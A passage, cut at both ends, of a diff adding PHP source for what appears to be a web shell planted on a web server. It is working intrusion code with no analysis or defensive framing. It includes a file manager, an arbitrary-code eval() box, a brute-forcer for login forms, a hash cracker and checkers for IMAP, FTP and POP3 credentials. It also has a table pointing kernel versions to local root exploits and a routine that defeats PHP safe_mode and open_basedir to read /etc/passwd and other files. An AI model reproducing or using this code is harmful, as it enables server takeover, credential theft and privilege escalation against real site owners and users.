title='Shell:".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>'; +$size=showsizE(filesize($fn)); +if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2; +echo "<a href='".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>"; +if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '</a>'; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>$cl1";echo "<a href='#' onClick=\"javascript:chmoD('$fn')\" title='Change mode'>";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_executable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "</a></td>"; +echo "$cl1$size</td>"; +echo $cl2.$fileaction; +echo '</tr>'; +} +foreach($link as $ln){ +$own='Unknow'; +$i++; +$owner=posix_getpwuid(fileowner($ln)); +$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>Open</option><option value='".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."'>Edit</option><option value='".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."'>Download</option><option value='".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."'>Hex view</option><option value='".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."'>Image</option><option value='".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."'>Include</option><option value='".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."'>Checksum</option><option value='".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."'>Copy</option><option value='".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."'>Move</option><option value='".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."'>Rename</option><option value='".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."'>Remove</option></select></td>"; +$mdate=date('Y/m/d H:i:s',filemtime($ln)); +$adate=date('Y/m/d H:i:s',fileatime($ln)); +if($owner)$own="<a title='Shell: ".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>'; +echo 
'<tr>'; +$size=showsizE(filesize($ln)); +if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2; +echo "<a href='".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."'>"; +if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '</a>'; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>${cl1}";echo "<a href='#' onClick=\"javascript:chmoD('$ln')\" title='Change mode'>L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "</a></td>"; +echo "$cl1$size</td>"; +echo $cl2.$linkaction; +echo '</tr>'; +} +} +$dc=count($dir)-2; +if($dc==-2)$dc=0; +$fc=count($file); +$lc=count($link); +$total=$dc+$fc+$lc; +$min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size'),'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).' MB'; +echo "</table></div>$table<tr><td><form method=POST>Find:<input type=text value=\$pass name=search><input type=checkbox name=re value=1 style='border-width:1px;background-color:#333333;'>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value='fm' name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width='100%'><tr><td width='50%'><br><table bgcolor=#333333 border=0 width='65%'><td><b>Summery:</b> Total: $total Directories: $dc Files: $fc Links: $lc$et<table 
bgcolor=#333333 border=0 width='65%'><td width='100%' bgcolor=";if (is_writeable($cwd)) echo '#006E00';elseif (!is_readable($cwd)) echo '#800000';else '#333333'; echo '>Current directory status: ';if (is_readable($cwd)) echo 'R';if (is_writeable($cwd)) echo 'W' ;echo "$et<table border=0 style='border-collapse: collapse' width='65%'><tr><td width='100%' bgcolor='#333333'>New:</td></tr><tr>$td1n<form method='POST'><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value='File'><input class=buttons type=submit name=newdir value='Folder'></form>$et</td><td width='50%'><br>${t}Upload:</td></tr><tr>$td1n<form method='POST' enctype='multipart/form-data'><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is $min</form>$et$et"; +} +} +function imapchecK($host,$username,$password,$timeout){ +$sock=fsockopen($host,143,$n,$s,$timeout); +$b=uniqid('NJ'); +$l=strlen($b); +if(!$sock)return -1; +fread($sock,1024); +fputs($sock,"$b LOGIN $username $password\r\n"); +$res=fgets($sock,$l+4); +fclose($sock); +if($res=="$b OK")return 1;else return 0; +} +function ftpchecK($host,$username,$password,$timeout){ +$ftp=ftp_connect($host,21,$timeout); +if(!$ftp)return -1; +$con=ftp_login($ftp,$username,$password); +if($con)return 1;else return 0; +} +function pop3checK($server,$user,$pass,$timeout){ +$sock=fsockopen($server,110,$en,$es,$timeout); +if(!$sock)return -1; +fread($sock,1024); +fwrite($sock,"user $user\n"); +$r=fgets($sock); +if($r{0}=='-')return 0; +fwrite($sock,"pass $pass\n"); +$r=fgets($sock); +fclose($sock); +if($r{0}=='+')return 1; +return 0; +} +function formcrackeR(){ +global $errorbox,$footer,$et,$hcwd; +if(!empty($_REQUEST['start'])){ +if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; +$url=$_REQUEST['target']; +$uf=$_REQUEST['userf']; 
+$pf=$_REQUEST['passf']; +$sf=$_REQUEST['submitf']; +$sv=$_REQUEST['submitv']; +$method=$_REQUEST['method']; +$fail=$_REQUEST['fail']; +$dic=$_REQUEST['dictionary']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:''; +if(!file_exists($dic))die("$errorbox Can not open dictionary.$et$footer"); +$dictionary=fopen($dic,'r'); +echo '<font color=blue>Cracking started...<br>'; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$url.="?$uf=$user&$pf=$pass&$sf=$sv"; +$res=check_urL($url,$method,$fail,12); +if(!$res){echo "<font color=blue>U: $user P: $pass</font><br>";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");if(!$type)break;} +} +fclose($dictionary); +echo 'Done!</font><br>'; +} +else echo "<center><table border=0 style='border-collapse: collapse' width='434'><tr><td width='174' bgcolor='#333333'>HTTP Form cracker:</td><td bgcolor='#333333' width='253'></td></tr><form method='POST' name=form><tr><td width='174' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width='253'><input type=text name=dictionary size=35></td></tr><tr><td width='174' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='174' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width='174' bgcolor='#808080'>Action Page:</td><td bgcolor='#808080' width='253'><input type=text name=target value='http://".getenv('HTTP_HOST')."/login.php' size=35></td></tr><tr><td width='174' 
bgcolor='#666666'>Method:</td><td bgcolor='#666666' width='253'><select size='1' name='method'><option selected value='POST'>POST</option><option value='GET'>GET</option></select></td></tr><tr><td width='174' bgcolor='#808080'>Username field name:</td><td bgcolor='#808080' width='253'><input type=text name=userf value=user size=35></td></tr><tr><td width='174' bgcolor='#666666'>Password field name:</td><td bgcolor='#666666' width='253'><input type=text name=passf value=passwd size=35></td></tr><tr><td width='174' bgcolor='#808080'>Submit name:</td><td bgcolor='#808080' width='253'><input type=text value=login name=submitf size=35></td></tr><tr><td width='174' bgcolor='#666666'>Submit value:</td><td bgcolor='#666666' width='253'><input type=text value='Login' name=submitv size=35></td></tr><tr><td width='174' bgcolor='#808080'>Fail string:</td><td bgcolor='#808080' width='253'><input type=text name=fail value='Try again' size=35></td></tr><tr><td width='174' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> <input class=buttons type=submit name=start value=Start></form>$et</center>"; +} +function hashcrackeR(){ +global $errorbox,$t,$et,$hcwd; +if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){ +if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if($dictionary){ +$hash=strtoupper($_REQUEST['hash']); +echo '<font color=blue>Cracking '.htmlspecialchars($hash).'...<br>'; +$type=($_REQUEST['type']=='MD5')?'md5':'sha1'; +while(!feof($dictionary)){ +$word=trim(fgets($dictionary)," \n\r"); +if($hash==strtoupper(($type($word)))){echo "The answer is 
$word<br>";if($log)file_add_contentS($file,"$x\r\n");break;} +} +echo 'Done!</font>'; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +echo "<center>${t}Hash cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Hash:</td><td bgcolor='#808080'><input type=text name=hash size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Type:</td><td bgcolor='#666666'><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width='20%' bgcolor='#808080'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#808080;' checked>Log</td><td bgcolor='#808080'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>"; +} +function pr0xy(){ +global $errorbox,$et,$footer,$hcwd; +echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><form method='POST'><tr><td width='20%'><b>Navigator: </b><input type=text name=urL size=140 value='";if(!!empty($_REQUEST['urL'])) echo 'http://www.edpsciences.org/htbin/ipaddress'; else echo htmlspecialchars($_REQUEST['urL']);echo "'>$hcwd<input type=submit class=buttons value=Go></form>$et"; +if(!empty($_REQUEST['urL'])){ +$u=parse_url($_REQUEST['urL']); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +$dir=dirname($file); +$con=getiT($_REQUEST['urL']); 
+$s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/")); +$con=replace_stR($s,$con); +echo $con; +} +} +function sqlclienT(){ +global $t,$errorbox,$et,$hcwd; +if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ +$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; +$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; +$res=querY($type,$server,$user,$pass,$db,$query); +if($res){ +$res=str_replace('|-|-|-|-|-|','</td><td>',$res); +$res=str_replace('|+|+|+|+|+|','</td></tr><tr><td>',$res); +$r=explode('[+][+][+]',$res); +$r[1]=str_replace('[-][-][-]',"</td><td bgcolor='333333'>",$r[1]); +echo "<table border=0 bgcolor='666666' width='100%'></tr><tr><td bgcolor='333333'>".$r[1].'</tr><tr><td>'.$r[0]."$et<br>"; +} +else{ +echo "$errorbox Failed!$et<br>"; +} +} +if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; +echo "<center>${t}SQL cilent:</td><form name=client method='POST'><td bgcolor='#333333'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='MySQL')echo 'selected';echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled 
= false;' ";if ($_REQUEST['typE']=='MSSQL')echo 'selected';echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";if ($_REQUEST['typE']=='Oracle')echo 'selected';echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';echo ">PostgreSQL</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root'; echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value='";if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123456'; echo "' name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text value='";if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']); echo "' name=dB size=35></td><tr><td width='20%' bgcolor='#666666'>Query:</td><td bgcolor='#666666'><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "</textarea></td></tr></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Submit Query'></form>$et</center>"; +} +function querY($type,$host,$user,$pass,$db='',$query){ +$res=''; +switch($type){ +case 'MySQL': +if(!function_exists('mysql_connect'))return 0; +$link=mysql_connect($host,$user,$pass); +if($link){ +if(!empty($db))mysql_select_db($db,$link); +$result=mysql_query($query,$link); 
+while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; +$res.='[+][+][+]'; +for($i=0;$i<mysql_num_fields($result);$i++) +$res.=mysql_field_name($result,$i).'[-][-][-]'; +mysql_close($link); +return $res; +} +break; +case 'MSSQL': +if(!function_exists('mssql_connect'))return 0; +$link=mssql_connect($host,$user,$pass); +if($link){ +if(!empty($db))mssql_select_db($db,$link); +$result=mssql_query($query,$link); +while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; +$res.='[+][+][+]'; +for($i=0;$i<mssql_num_fields($result);$i++) +$res.=mssql_field_name($result,$i).'[-][-][-]'; +mssql_close($link); +return $res; +} +break; +case 'Oracle': +if(!function_exists('ocilogon'))return 0; +$link=ocilogon($user,$pass,$db); +if($link){ +$stm=ociparse($link,$query); +ociexecute($stm,OCI_DEFAULT); +while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; +$res.='[+][+][+]'; +for($i=0;$i<oci_num_fields($stm);$i++) +$res.=oci_field_name($stm,$i).'[-][-][-]'; +return $res; +} +break; +case 'PostgreSQL': +if(!function_exists('pg_connect'))return 0; +$link=pg_connect("host=$host dbname=$db user=$user password=$pass"); +if($link){ +$result=pg_query($link,$query); +while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; +$res.='[+][+][+]'; +for($i=0;$i<pg_num_fields($result);$i++) +$res.=pg_field_name($result,$i).'[-][-][-]'; +pg_close($link); +return $res; +} +break; +} +return 0; +} +function phpevaL(){ +global $t,$hcwd,$et; +echo '<center>'; +if(!empty($_REQUEST['code'])){ +$s=array('<?php'=>'','<?'=>'','?>'=>''); +echo "<textarea rows='10' cols='64'>";echo htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo '</textarea><br><br>'; +} +echo "${t}Evaler:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Codes:</td><td bgcolor='#666666'><textarea rows='10' name='code' 
cols='64'>";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Execute></form>$et</center>"; +} +function rootxpL(){ +$v=php_uname(); +$db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip'); +foreach($db as $k=>$x)if(strstr($v,$k))return $x; +return 0; +} +function toolS(){ +global $t,$hcwd,$et,$cwd; +if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){ +$ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5); +fputs($ser,$_REQUEST['domaiN']."\r\n"); +echo 
'<pre>'; +while(!feof($ser))echo fgets($ser,1024); +echo '</pre>'; +fclose($ser); +} +elseif(!empty($_REQUEST['urL'])){ +$h=''; +$u=parse_url($_REQUEST['urL']); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port']; +$ser=fsockopen($host,$port,$en,$es,5); +if($ser){ +fputs($ser,"GET $file\r\nHost: $host\r\n\r\n"); +echo '<pre>'; +while($h!="\r\n"){$h=fgets($ser,1024);echo $h;} +echo '</pre>'; +fclose($ser); +} +} +elseif(!empty($_REQUEST['ouT']) && isset($_REQUEST['pW'])&& !empty($_REQUEST['uN'])){ +$htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd'; +$htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess'; +file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES)); +file_put_contents($htaccess,"AuthName \"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire valid-user\r\n"); +echo '<font color=blue>Done</font>'; +} +$s="</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>"; +echo "<center>${t}WhoIs:${s}Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'whois.geektools.com'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>domain:</td><td bgcolor='#808080'><input type=text name=domaiN value='";if (!empty($_REQUEST['domaiN'])) echo htmlspecialchars($_REQUEST['domaiN']); else echo 'google.com'; echo "' size=35></td><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value='Do'></form>$et<br>${t}.ht* generator:${s}Username:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['uN'])) echo htmlspecialchars($_REQUEST['uN']);else echo 'r00t'; echo "' name=uN size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Password:</td><td bgcolor='#808080'><input type=text name=pW value='";if (!empty($_REQUEST['pW'])) echo 
htmlspecialchars($_REQUEST['pW']); else echo uniqid('@'); echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Directory:</td><td bgcolor='#666666'><input type=text name=ouT value='";if (!empty($_REQUEST['ouT'])) echo htmlspecialchars($_REQUEST['ouT']); else echo $cwd; echo "' size=35></td><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab header:${s}URL:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['urL']))echo htmlspecialchars($_REQUEST['urL']);else echo 'http://netjackal.by.ru/index.htm'; echo "' name=urL size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Get'></form>$et<br></center>"; +} +function hexvieW(){ +if(!empty($_REQUEST['filE'])){ +$f=$_REQUEST['filE']; +echo "<table border=0 style='border-collapse: collapse' width='100%'><td width='10%' bgcolor='#282828'>Offset</td><td width='25%' bgcolor='#282828'>Hex</td><td width='25%' bgcolor='#282828'></td><td width='40%' bgcolor='#282828'>ASCII</td></tr>"; +$file=fopen($f,'r'); +$i=-1; +while(!feof($file)){ +$ln=''; +$i++; +echo "<tr><td width='10%' bgcolor='#"; +if($i % 2==0)echo '666666';else echo '808080'; +echo "'>";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '</td>'; +echo "<td width='25%' bgcolor='#"; +if($i % 2==0)echo '666666';else echo '808080'; +echo "'>"; +for($j=0;$j<=7;$j++){ +if(!feof($file)){ +$tmp=strtoupper(dechex(ord(fgetc($file)))); +if(strlen($tmp)==1)$tmp='0'.$tmp; +echo $tmp.' '; +$ln.=$tmp; +} +} +echo "</td><td width='25%' bgcolor='#"; +if($i % 2==0)echo '666666';else echo '808080'; +echo "'>"; +for($j=7;$j<=14;$j++){ +if(!feof($file)){ +$tmp=strtoupper(dechex(ord(fgetc($file)))); +if(strlen($tmp)==1)$tmp='0'.$tmp; +echo $tmp.' 
'; +$ln.=$tmp; +} +} +echo "</td><td width='40%' bgcolor='#"; +if($i % 2==0)echo '666666';else echo '808080'; +echo "'>"; +$n=0;$asc='';$co=0; +for($k=0;$k<=16;$k++){ +$co=hexdec(substr($ln,$n,2)); +if(($co<=31)||(($co>=127)&&($co<=160)))$co=46; +$asc.=chr($co); +$n+=2; +} +echo htmlspecialchars($asc); +echo '</td></tr>'; +} +} +fclose($file); +echo '</table>'; +} +function safemodE(){ +global $windows,$t,$hcwd,$et; +$file=(empty($_REQUEST['file']))?'/etc/passwd':$_REQUEST['file']; +$pr="\r\n</font><font color=green>Method "; +$po=")</font><font color=blue>\r\n"; +$i=1; +if(!empty($_REQUEST['read'])){ +echo "<pre>$pr$i:(ini_restore$po"; +ini_restore('safe_mode');ini_restore('open_basedir'); +readfile($file); +$i++; +echo "$pr$i:(include$po"; +include($file); +$i++; +echo "$pr$i:(copy$po"; +$tmp=tempnam('','cx'); +copy('compress.zlib://'.$file,$tmp); +$fh=fopen($tmp,'r'); +$data=fread($fh,filesize($tmp)); +fclose($fh); +echo $data; +$i++; +if(function_exists('mb_send_mail')){ +echo "$pr$i:(mb_send_mail$po"; +if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail'); +mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail'); +readfile('/tmp/mb_send_mail'); +$i++; +} +if(function_exists('curl_init')){ +echo "$pr$i:(curl_init [A]$po"; +$fh=curl_init('file://'.$file.''); +$tmp=curl_exec($fh); +echo $tmp; +$i++; +echo "$pr$i:(curl_init [B]$po"; +$i++; +if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__); +else $ch=curl_init('file://'.$file."\x00".__FILE__); +var_dump(curl_exec($ch)); +} +if(is_writable('.')){ +echo "$pr$i:(php.ini$po"; +file_put_contents('php.ini','safe_mode = Off'); +readfile($file); +unlink('php.ini'); +$i++; +} +if(is_object($ws=new COM('WScript.Shell'))){ +echo "$pr$i:(COM$po"; +echo $exec=comshelL("type \"$file\"",$ws); +$i++; +} +if(checkfunctioN('win_shell_execute')){ +echo "$pr$i:(win32std$po"; +echo winshelL("type \"$file\""); +$i++; +} 
+if(checkfunctioN('win32_create_service')){ +echo "$pr$i:(win32service$po"; +echo srvshelL("type \"$file\""); +$i++; +} +if(function_exists('imap_open')){ +echo "$pr$i:(imap [A]$po"; +$str=imap_open('/etc/passwd','',''); +$list=imap_list($str,$file,'*'); +for($i=0;$i<count($list);$i++)echo $list[$i]."\n"; +imap_close($str); +$i++; +echo "$pr$i:(imap [B]$po"; +$str=imap_open($file,'',''); +$tmp=imap_body($str,1); +echo $tmp; +imap_close($str); +$i++; +} +if($file=='/etc/passwd'){ +echo "$pr$i:(posix$po"; +for($uid=0;$uid<99999;$uid++){ +$h=posix_getpwuid($uid); +if(!empty($h))foreach($h as $v)echo "$v:"; +echo "\r\n"; +} +} +echo "\n</pre></font>"; +} +elseif(!empty($_REQUEST['show'])){ +echo "<pre>$pr$i:(glob$po"; +$con=glob("$file*"); +foreach ($con as $v){ + echo "$v\n"; +} +$i++; +if(function_exists('imap_open')){ +echo "$pr$i:(imap$po"; +$str=imap_open('/etc/passwd','',''); +$s=explode("|",$file); +if(count($s)>1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*'); +for($i=0;$i<count($list);$i++)echo "$list[$i]\r\n"; +imap_close($str); +$i++; +} +if(is_object($ws=new COM('WScript.Shell'))){ +echo "$pr$i:(COM$po"; +$exec=comshelL("dir \"$file\"",$ws); +$exec=str_replace("\t",'',$exec); +echo $exec; +$i++; +} +if(checkfunctioN('win_shell_execute')){ +echo "$pr$i:(win32std$po"; +echo winshelL("dir \"$file\""); +$i++; +} +if(checkfunctioN('win32_create_service')){ +echo "$pr$i:(win32service$po"; +echo srvshelL("dir \"$file\""); +$i++; +} +echo "\n</pre></font>"; +} +elseif(!empty($_REQUEST['sql'])){ +$ta=uniqid('N'); +$s=array("CREATE TEMPORARY TABLE $ta (file LONGBLOB)","LOAD DATA INFILE '".addslashes($_REQUEST['file'])."' INTO TABLE $ta","SELECT * FROM $ta"); +$l=mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']); +mysql_select_db($_REQUEST['db'],$l); +echo '<pre><font color=blue>'; +foreach($s as $v){ +$q = mysql_query($v,$l); +while($d=mysql_fetch_row($q))echo htmlspecialchars($d[0]); +} +echo 
